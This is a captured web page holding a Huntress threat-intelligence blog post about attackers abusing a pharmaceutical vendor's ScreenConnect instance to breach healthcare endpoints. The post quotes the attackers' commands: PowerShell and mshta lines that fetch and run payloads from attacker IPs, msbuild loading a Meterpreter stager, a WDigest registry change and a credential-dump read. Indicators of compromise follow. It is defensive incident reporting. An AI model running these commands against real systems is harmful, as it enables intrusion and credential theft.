www.huntress.com
Open in
urlscan Pro
2606:2c40::c73c:67e4
Public Scan
URL:
https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack
Submission: On November 13 via api from TR — Scanned from DE
Submission: On November 13 via api from TR — Scanned from DE
Form analysis 4 forms found in the DOM
/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<div class="pwr--relative">
<input type="text" id="pwr-js-burger-search__input" class="pwr-burger-search__input hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Type search here">
<button class="pwr-search-field__icon" type="submit"><span id="hs_cos_wrapper_module_167327601750737_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_icon" style="" data-hs-cos-general-type="widget" data-hs-cos-type="icon"><svg
version="1.0" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" aria-hidden="true">
<g id="search2_layer">
<path
d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z">
</path>
</g>
</svg></span></button>
</div>
</form>/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<input type="text" id="pwr-js-burger-search__input" class="" name="term" autocomplete="off" aria-label="Search" placeholder="Search">
</form>/hs-search-results
<form action="/hs-search-results" data-hs-cf-bound="true">
<div class="pwr--relative">
<input type="text" id="pwr-header-search__input" class="pwr-header-search__input hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Type search here. Hit enter to submit or escape to close.">
<button class="pwr-search-field__icon" type="submit"><span id="hs_cos_wrapper_module_167327601750737_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_icon" style="" data-hs-cos-general-type="widget" data-hs-cos-type="icon"><svg
version="1.0" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" aria-hidden="true">
<g id="search3_layer">
<path
d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z">
</path>
</g>
</svg></span></button>
<a href="#" id="pwr-js-header-search__close" class="pwr-header-search__close">
<span class="pwr-header-search__close-icon"></span>
</a>
</div>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/3911692/196be66c-f1bb-4156-af05-2952954526cd
<form id="hsForm_196be66c-f1bb-4156-af05-2952954526cd_915" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/3911692/196be66c-f1bb-4156-af05-2952954526cd"
class="hs-form-private hsForm_196be66c-f1bb-4156-af05-2952954526cd hs-form-196be66c-f1bb-4156-af05-2952954526cd hs-form-196be66c-f1bb-4156-af05-2952954526cd_a131a6bc-239a-4493-9b08-d1a98529f9ab hs-form stacked hs-custom-form"
target="target_iframe_196be66c-f1bb-4156-af05-2952954526cd_915" data-instance-id="a131a6bc-239a-4493-9b08-d1a98529f9ab" data-form-id="196be66c-f1bb-4156-af05-2952954526cd" data-portal-id="3911692" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-196be66c-f1bb-4156-af05-2952954526cd_915" class="" placeholder="Enter your Work Email (required)"
for="email-196be66c-f1bb-4156-af05-2952954526cd_915"><span>Work Email (required)</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-196be66c-f1bb-4156-af05-2952954526cd_915" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Subscribe"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1699841617055","formDefinitionUpdatedAt":"1697650100341","lang":"en","embedType":"REGULAR","clonedFromForm":"6da6c019-9d2a-47d7-8966-09563d0875cf","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36","pageTitle":"Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack","pageUrl":"https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack","pageId":"144413561137","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack","contentType":"blog-post","hutk":"31aeb14eaf24535a97fb56c65815fb5e","__hsfp":972325071,"__hssc":"1139630.1.1699841618797","__hstc":"1139630.31aeb14eaf24535a97fb56c65815fb5e.1699841618797.1699841618797.1699841618797.1","formTarget":"#hs_form_target_module_155266670085300_subscribe","formInstanceId":"915","pageName":"Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack","rumScriptExecuteTime":822,"rumTotalRequestTime":1141.099998474121,"rumTotalRenderTime":1193.400001525879,"rumServiceResponseTime":319.0999984741211,"rumFormRenderTime":52.30000305175781,"locale":"en","timestamp":1699841618805,"originalEmbedContext":{"portalId":"3911692","formId":"196be66c-f1bb-4156-af05-2952954526cd","region":"na1","target":"#hs_form_target_module_155266670085300_subscribe","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"915","formsBaseUrl":"/_hcms/forms","css":"","isMobileResponsive":true,"pageName":"Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack","pageId":"144413561137","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"a131a6bc-239a-4493-9b08-d1a98529f9ab","renderedFieldsIds":["email"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.4110","sourceName":"forms-embed","sourceVersion":"1.4110","sourceVersionMajor":"1","sourceVersionMinor":"4110","allPageIds":{"embedContextPageId":"144413561137","analyticsPageId":"144413561137","contentPageId":144413561137,"contentAnalyticsPageId":"144413561137"},"_debug_embedLogLines":[{"clientTimestamp":1699841617229,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1699841617230,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack\",\"pageUrl\":\"https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36\",\"pageId\":\"144413561137\",\"contentAnalyticsPageId\":\"144413561137\",\"contentPageId\":144413561137,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1699841617232,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1699841618802,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"31aeb14eaf24535a97fb56c65815fb5e\",\"canonicalUrl\":\"https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack\",\"contentType\":\"blog-post\",\"pageId\":\"144413561137\"}"}]}"><iframe
name="target_iframe_196be66c-f1bb-4156-af05-2952954526cd_915" style="display: none;"></iframe>
</form>Text Content
This website uses cookies to improve your viewing experience. To find out more
about the cookies we use, see our Privacy Policy.
Accept Decline
Skip to content
Close
* Platform
* Platform Overview Cybersecurity for the 99%
* Managed EDR Stop Attacks with Process Insights
* SOC 24/7 Human Threat Hunting
* Persistent Footholds Find Attackers Hiding in Plain Sight
* Managed Antivirus Strengthen Frontline Protection
* MDR for Microsoft 365 Microsoft 365 Threat Detection
* Ransomware Canaries Detect Ransomware Faster
* External Recon Scan Ports & Potential Exposures
* Security Awareness Training Sharpen Your Employees' Defenses
* Partner Enablement Grow Your Cybersecurity Practice
See The Huntress Managed Security Platform in Action
Ask questions, explore the dashboard and more
Book a demo >
* Who We Serve
* Managed Service Providers Empowering MSPs to Secure End Customers
* Value Added Resellers A Complete ready-to-sell platform for VARs
* Businesses & IT Teams Empowering IT to Bridge the Cyber Gap
* Resources
* Cybersecurity Education Webinars, eBooks and More
* Upcoming Events Tradeshows and Live Industry Events
* Tradecraft Tuesday No Product. No Pitches. Just Tradecraft.
* Success Stories Case Studies & Testimonials
* Community Fireside Chat Check out the latest Fireside Chats
* Blog
* Company
* Leadership Team Meet the Team Taking the Fight to Hackers
* Press Media Coverage, Interviews & More
* Careers Join the Hunt - We're Hiring!
* Contact Us Talk to Sales, Get Help or Say Hello :)
* Partners
* Partner Login Access Your Huntress Dashboard
* Support Documentation Technical Product Support, FAQs & More
SEARCH
Free Trial
* Platform
* Platform Overview Cybersecurity for the 99%
* Managed EDR Stop Attacks with Process Insights
* SOC 24/7 Human Threat Hunting
* Persistent Footholds Find Attackers Hiding in Plain Sight
* Managed Antivirus Strengthen Frontline Protection
* MDR for Microsoft 365 Microsoft 365 Threat Detection
* Ransomware Canaries Detect Ransomware Faster
* External Recon Scan Ports & Potential Exposures
* Security Awareness Training Sharpen Your Employees' Defenses
* Partner Enablement Grow Your Cybersecurity Practice
See The Huntress Managed Security Platform in Action
Ask questions, explore the dashboard and more
Book a demo >
* Who We Serve
* Managed Service Providers Empowering MSPs to Secure End Customers
* Value Added Resellers A Complete ready-to-sell platform for VARs
* Businesses & IT Teams Empowering IT to Bridge the Cyber Gap
* Resources
* Cybersecurity Education Webinars, eBooks and More
* Upcoming Events Tradeshows and Live Industry Events
* Tradecraft Tuesday No Product. No Pitches. Just Tradecraft.
* Success Stories Case Studies & Testimonials
* Community Fireside Chat Check out the latest Fireside Chats
* Blog
* Company
* Leadership Team Meet the Team Taking the Fight to Hackers
* Press Media Coverage, Interviews & More
* Careers Join the Hunt - We're Hiring!
* Contact Us Talk to Sales, Get Help or Say Hello :)
* Partners
* Partner Login Access Your Huntress Dashboard
* Support Documentation Technical Product Support, FAQs & More
Free Trial
Team Huntress 11.9.2023 11 min read
BITTER PILL: THIRD-PARTY PHARMACEUTICAL VENDOR LINKED TO PHARMACY AND HEALTH
CLINIC CYBERATTACK
Previous Post
Next Post
Share on Twitter
Share on LinkedIn
Share on Facebook
Share on Reddit
In a concerning development within the healthcare sector, Huntress has
identified a series of unauthorized access that signifies internal
reconnaissance and preparation for additional threat actor activity against
multiple healthcare organizations.
The attackers abused a locally hosted instance of a widely-used remote access
tool, ScreenConnect—utilized by the company Transaction Data Systems (which
recently merged with and was renamed Outcomes), the makers of Rx30 and
ComputerRx software — for initial access to victim organizations. The threat
actor proceeded to take several steps, including installing additional remote
access tools such as ScreenConnect or AnyDesk instances, to ensure persistent
access to the environments.
OVERVIEW
In this article, there are multiple ScreenConnect instances at play; there are a
total of four instances observed, across two endpoints, from completely distinct
organizations (i.e., not the same company, not managed by the same MSP,
geographically separated, etc.). One of those ScreenConnect instances appeared
and was used by the threat actor on both endpoints.
There were similarities in tactics, techniques, and procedures (TTPs) across
both endpoints, as well as multiple intersections in indicators of compromise
(IOCs). Specifically, one ScreenConnect instance (instance B) was observed being
actively used on both endpoints, the “[redacted 1]” account was observed being
used to access both endpoints via ScreenConnect, and the file test.xml was
downloaded to both endpoints via PowerShell.
ENDPOINT 1
Endpoint 1 is a Windows Server 2019 Standard system within an infrastructure in
the pharmaceutical field. Log data allowed the Huntress team to ‘see’ as far
back as August 9, 2023, where the team observed ScreenConnect instance A being
accessed via an account named “[redacted 1]”. There were repeated “Connected”
and “Disconnected” messages for the account until the file
ConnectWiseControl.ClientSetup.msi was downloaded and launched, installing
ScreenConnect instance B on the endpoint. Then, beginning on August 10, 2023,
the “[redacted 1]” account was used to access the endpoint via ScreenConnect
instance B. There were several pairs of “Connected” and “Disconnected” messages
in the logs for the “[redacted 1]” account until October 28, 2023.
On October 28, the “[redacted 2]” account was used to access ScreenConnect
instance B, and run the following PowerShell command:
powershell -command "& { (New-Object
Net.WebClient).DownloadFile('http://2.57.149[.]103/a.msi',
'C:\Users\Administrator\Documents\a.msi') }"
The a.msi file was launched via MsiExec.exe, installing ScreenConnect instance C
on the endpoint, connecting to IP address 45.66.230[.]146 via port 8041. Shortly
after the installation completed, the “[redacted 2]” account disconnected from
ScreenConnect instance B.
Two days later, on October 30, ScreenConnect instance C was used to run the
following PowerShell command:
powershell -Command "$wc = New-Object System.Net.WebClient;
$wc.DownloadFile('http://119.91.138[.]133:443/test.xml',
'c:\programdata\test.xml')"
Almost 20 hours later, on October 31, ScreenConnect instance B was used to run
the following command:
C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
C:\programdata\test.xml
The payload, test.xml, consists of C# code forking the publicly available nps
project for detection evasion and process execution. As designed, the payload
attempts to load a Metasploit Meterpreter instance in memory, but antimalware
protections on the system identified and attempted to terminate execution.
However, this does not appear to have succeeded, as additional processes were
observed being launched via the Printer Spooler service, spoolsv.exe. For
example, the following processes were observed being run:
nslookup myip.opendns[.]com. Resolver1.opendns[.]com
powershell -command "Import-Module ActiveDirectory;Get-ADComputer -Filter *
-Properties * | Sort IPv4Address | FT Name, ipv4*, oper*, LastLogonDate
-Autosize"
C:\Windows\system32\cmd.exe /S /D /c type C:\Windows\System32\mimilsa.log |
findstr /V Mailbox
ENDPOINT 2
Endpoint 2 is also a Windows Server 2019 Standard system, within an
infrastructure in the healthcare field. Log data illustrates that ScreenConnect
instance B (the same “instance B” observed on endpoint 1) was installed and
actively being connected to via the “[redacted 1]” account as of November 8,
2022. On November 1, 2023, the file s.msi was transferred to the endpoint via
the ScreenConnect instance; launching this file led to ScreenConnect instance D
being installed on this endpoint, with the instance configured to connect to
185.12.45[.]98 on port 8041.
It was clear that ScreenConnect instance B was still running and accessible on
the endpoint; on November 5, 2023, an error message indicated that the instance
attempted to connect to the configured endpoint, and a DNS Client message was
observed indicating that the configured endpoint could not be resolved.
On November 6, the following PowerShell command was run via ScreenConnect
instance D:
powershell -Command $wc = New-Object System.Net.WebClient;
$wc.DownloadFile('http://119.91.138[.]133:443/test.xml',
'c:\programdata\test.xml')
The use of msbuild.exe to compile the file and launch the payload was not
observed on this endpoint. However, four hours later, the following PowerShell
command was run, also via ScreenConnect instance D:
powershell -Command $wc = New-Object System.Net.WebClient;
$wc.DownloadFile('https://bashupload[.]com/PXYpf/a.msi', 'c:\programdata\a.msi')
This file was launched via msiexec.exe, installing the “AnyDeskMSI Service”.
However, about a minute and a half after being launched, this service was
stopped via taskkill.exe.
Approximately four hours later, the threat actor made multiple attempts to
create the “manager” user account and add the account to the local Administrator
group on the endpoint. Once their efforts were successful, the threat actor
logged out, then logged back into ScreenConnect instance D via the newly created
account, and then used that instance to transfer and launch the file
Advanced_IP_Scanner_2.5.4594.1.exe. Finally, the threat actor was observed
running the following commands:
mshta http://119.91.138[.]133:9999/5E1Ch
taskkill /F /IM mshta.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f
SCREENCONNECT INSTANCE B
ScreenConnect instance B, found on both endpoints and accessed via the
“[redacted 1]” account, per the user.config file retrieved from one of the
endpoints monitored via Huntress, is tied to rs.tdsclinical[.]com.
The observed domain is legitimate and associated with Transaction Data Systems
(now named Outcomes). At this time, Huntress cannot identify whether Transaction
Data Systems itself has been breached, if credentials for a legitimate
Transaction Data Systems-associated employee or user have been leaked, or if
some other mechanism was involved tying their remote management of these clients
to subsequent threat actor abuse.
TECHNICAL INDICATORS OF COMPROMISE (IOCS)
Huntress has identified and urges immediate action upon the following IoCs:
NETWORK OBSERVABLES
IP Address
Hosting Provider
Hosting Location
Function
119.91.138[.]133
Tencent Computer Systems
CN
Primary infrastructure for storing and retrieving post-access payloads
185.12.45[.]98
Private Layer Inc
PA
Connecting server associated with malicious ScreenConnect instance D
45.66.230[.]146
Delis LLC
NL
Connecting server associated with malicious ScreenConnect instance C
2.57.149[.]103
Red Byte LLC
PL
Hosting server for AnyDesk MSI installation
ASSOCIATED FILES & PAYLOADS
Name
SHA256
Function
test.xml
9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8
C# payload designed to load Meterpreter into victim memory
a.msi
70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56
AnyDesk MSI installer
s.msi
8c3b4febe58df0a01126d78109f52035d34a4e03f02b5d4fca3e4d94f3f657b3
ScreenConnect MSI installer
SCREENCONNECT INSTANCE IDS
ScreenConnect Instance ID
Description
adf02e34cba839d2
ScreenConnect instance ID B, associated with rs.tdsclinical[.]com
e3e2410d655306ff
ScreenConnect instance ID C, associated with 45.66.230[.]146
4974c38508ef2b18
ScreenConnect instance ID D, associated with 185.12.45[.]98
FILE PATHS AND NAMES
C:\programdata\a.msi
C:\programdata\test.xml
C:\Users\Administrator\Documents\a.msi
S.msi
C:\Users\manager\Documents\ConnectWiseControl\Files\Advanced_IP_Scanner_2.5.4594.1.exe
C:\Program Files (x86)\ScreenConnect Client (<unique
identifier>)\ScreenConnect.ClientService.exe
ADDITIONAL OBSERVABLES
While researching this event, Huntress analysts identified an open directory on
2.57.149[.]103, shown in the following figure:
In addition to a.msi, the AnyDesk installer previously discussed, two additional
files were located:
* b.msi (f28ee671c0f894154dd8c145f2b6b819b63348c785a682f60f37529a2aae174e):
another ScreenConnect client installer.
* t.zip (ba8521ef14f1ec09f0bcb8f490e30322ca4eb84fa0013ee3bbe9c6a24866d334): an
archive containing three additional payloads:
* WinPcap_4_1_3.exe
(fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de): a
legitimate WinPcap version 4.1.3 executable.
* Masscan64.exe
(174f91806e8bc1c0dea24192f7d4afcefc40a1731827b32939d4f411e8402d75): a
compiled version of the Masscan TCP port scanner.
* veeam.exe
(45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3d97f0d5b6e8997299d1a): an
executable containing code to exploit CVE-2023-27532 in Veeam software,
disclosed in March 2023.
The IP in question appears to be a tool repository for threat actors, although
the lack of observations on b.msi and payloads in t.zip in monitored
environments makes its association with the ScreenConnect incidents uncertain.
However, the payloads in question match overall observed behaviors in terms of
remote access tool installation (b.msi) and payloads associated with system
survey (masscan64.exe) and data capture (WinPcap_4_1_3.exe). The outlier is
veeam.exe, as all other observed activity indicates a combination of credential
capture or reuse with living-off-the-land techniques or abuse of legitimate
software.
MITIGATION GUIDANCE
Pharmacies and other healthcare organizations that may be clients of Transaction
Data Systems/Outcomes should immediately examine their systems and networks for
the above IoCs. Any discovery of these should be taken seriously and
investigated promptly. Given the potential implications of such a breach in the
healthcare industry, particularly regarding patient data, privacy, and
availability of critical services, a comprehensive response is essential.
> IF YOU’D LIKE TO HAVE SOMEONE ELSE WATCHING YOUR BACK WHILE YOU WORK ON
> SCOPING YOUR ENVIRONMENT, START A FREE TRIAL WITH US SO OUR 24/7 SOC CAN KEEP
> AN EYE OUT FOR YOU.
It's imperative for organizations within the healthcare domain to recognize the
gravity of such intrusions and take concerted steps to safeguard their
infrastructure. Enhanced endpoint monitoring, robust cybersecurity frameworks,
and proactive threat hunting are no longer optional but a necessity in the face
of such sophisticated cyber threats.
OUTREACH TO TRANSACTION DATA SYSTEMS/OUTCOMES
In our effort to respond responsibly to this situation, we have made several
attempts through various channels to contact Transaction Data Systems (now
Outcomes) to communicate our findings and offer support in addressing these
incidents. We have not yet been able to engage with their team.
We remain open and ready to collaborate for the safety and security of all
parties involved.
Share on Twitter
Share on LinkedIn
Share on Facebook
Share on Reddit
TEAM HUNTRESS
YOU MAY ALSO LIKE
Team Huntress 11.10.2023 8 min read
CRITICAL VULNERABILITY: SYSAID CVE-2023-47246
Huntress has analyzed the emerging SysAid CVE-2023-47246 vulnerability and
recreated the ...
Start Reading
Team Huntress 11.7.2023 6 min read
CONFLUENCE TO CERBER: EXPLOITATION OF CVE-2023-22518 FOR RANSOMWARE DEPLOYMENT
CVE-2023-22518 is being exploited in Confluence for Cerber ransomware
deployment. Read up ...
Start Reading
Hackers are constantly evolving to better attack small and mid-size
businesses—Huntress is how SMBs and managed service providers stay ahead with
managed cybersecurity solutions for endpoints, email, and identity.
LinkedIn Twitter Facebook YouTube BizRatings
* Platform
* Platform Overview
* For MSPs
* For VARs
* Free Trial
* Resources
* Cybersecurity Education
* Blog
* Events
* Careers
Sign Up for Blog Updates
Work Email (required)*
© 2023 Huntress - All rights reserved
* Terms of Use
* Privacy Policy
* Legal
* Cookie Policy